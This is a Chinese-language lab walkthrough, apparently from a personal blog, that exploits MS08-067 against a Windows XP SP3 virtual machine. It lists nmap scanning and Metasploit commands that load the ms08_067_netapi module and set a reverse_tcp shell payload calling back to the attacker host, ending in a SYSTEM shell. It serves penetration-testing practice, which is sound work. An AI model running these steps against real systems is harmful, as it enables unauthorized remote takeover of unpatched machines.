ms08067漏洞的利用,是安全滲透測試比較常用的案例。如果用戶在受影響的系統上收到特製的 RPC 請求,則該漏洞可能允許遠程執行代碼。 但是由於自身知識的侷限和疏忽,稍不留心就會失敗。筆者嘗試了幾次才成功。
測試環境,建議虛擬機組建局域網,筆者用的是virtualbox。
靶機:Windows XP,橋接網卡,IP 192.168.0.107 系統版本:
zh-hans_windows_xp_professional_with_service_pack_3_x86_cd_vl_x14-74070 配置好局域網共享。
攻擊主機: Kali Linux 2018-10-09,橋接網卡, IP 192.168.0.105 。
掃描一下目標主機
sudo nmap -sS -Pn -A 192.168.0.107
可以看出,已經探測出目標系統為XP sp2或者sp3.但是沒有探測出語言版本。
默認在Kali Linux開啟msfconsole需要先開啟postgresql服務。
sudo service postgresql start msfconsole
在msf終端中,執行開啟攻擊。
搜索ms08_067模塊,加載滲透攻擊模塊。
search ms08_067 use exploit/windows/smb/ms08_067_netapi
查看模塊的參數,一些參數必須設置,比如RHOST(目標IP),RPORT(目標端口)等。
show options
set RHOST 192.168.0.107 set RPORT 445
該端口默認445,但是某些情況下,139端口更好用。
設置攻擊載荷,並設置必備參數。
set payload windows/shell/reverse_tcp show options set LHOST 192.168.0.105
查看被影響的操作系統,默認是自動匹配。但是自動匹配不正確,會造成攻擊失敗。這是筆者的經驗教訓。
show targets set target 34 exploit
截圖沒有完整,安裝的系統是XP sp3 簡體中文版,編號是34.
攻擊成功,就是上圖的樣子,返回一個 system32> 的shell。獲取權限成功。